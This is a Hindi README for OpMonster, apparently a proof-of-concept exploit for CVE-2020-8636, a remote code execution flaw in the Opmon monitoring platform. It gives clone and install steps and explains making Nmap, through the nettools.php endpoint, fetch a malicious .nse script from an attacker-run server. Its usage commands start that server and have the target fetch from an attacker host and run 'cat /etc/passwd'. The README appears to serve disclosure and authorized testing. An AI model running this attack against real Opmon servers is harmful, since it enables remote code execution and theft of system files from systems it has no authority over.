
CVE-2020-8636 प्रमाणित रिमोट कोड निष्पादन शोषण Opmon के लिए
के बारे में • स्थापना • उपयोग • लाइसेंस
OpMonster CVE-2020-8636 के लिए एक साक्ष्य-अवधारणा शोषण है, जो Opmon निगरानी प्लेटफॉर्म में एक रिमोट कोड निष्पादन भेद्यता है। यह nettools.php एंडपॉइंट का दुरुपयोग करता है, जो आपको मनमाने --script विकल्पों के साथ Nmap चलाने देता है। शोषण Opmon को आपके नियंत्रण वाले सर्वर ( http-fetch के माध्यम से) से एक दुर्भावनापूर्ण .nse Nmap स्क्रिप्ट प्राप्त करने के लिए मजबूर करता है, इसे /tmp में ड्रॉप करता है, फिर लक्ष्य पर आपका कमांड निष्पादित करने और आउटपुट प्रिंट करने के लिए इसे चलाता है।
@phor3nsic द्वारा खोजा और विकसित किया गया। अधिक जानकारी: Opmon पर तीन CVE।
git clone https://github.com/phor3nsic/opmonster
cd opmonster
pip install requests
सबसे पहले, एक वेब सर्वर को ऐसे होस्ट पर शुरू करें जहाँ लक्ष्य पहुँच सके, ऐसी निर्देशिका में जहाँ से उत्पन्न .nse स्क्रिप्ट डाउनलोड की जा सके (शोषण स्क्रिप्ट को वर्तमान निर्देशिका में लिखता है):
php -S 0.0.0.0:1337
फिर चार स्थितीय तर्कों के साथ शोषण चलाएं:
python3 opmonster.py https://vulnhost.com myhost.ngrok.io 80 "cat /etc/passwd"
यदि लक्ष्य स्क्रिप्ट डाउनलोड नहीं करता ("कमजोर नहीं") या आपके सर्वर से बाहरी कनेक्शन नहीं बना सकता, तो शोषण एक संदेश के साथ रुक जाता है।
केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसका उपयोग कैसे करें इसकी जिम्मेदारी आपकी है।
| तर्क | विवरण |
|---|
HOST | लक्ष्य Opmon आधार URL (उदा. https://vulnhost.com) |
LHOST | आपका सर्वर होस्ट जो .nse स्क्रिप्ट प्रदान करता है |
LPORT | आपका सर्वर पोर्ट |
CMD | लक्ष्य पर निष्पादित करने के लिए कमांड |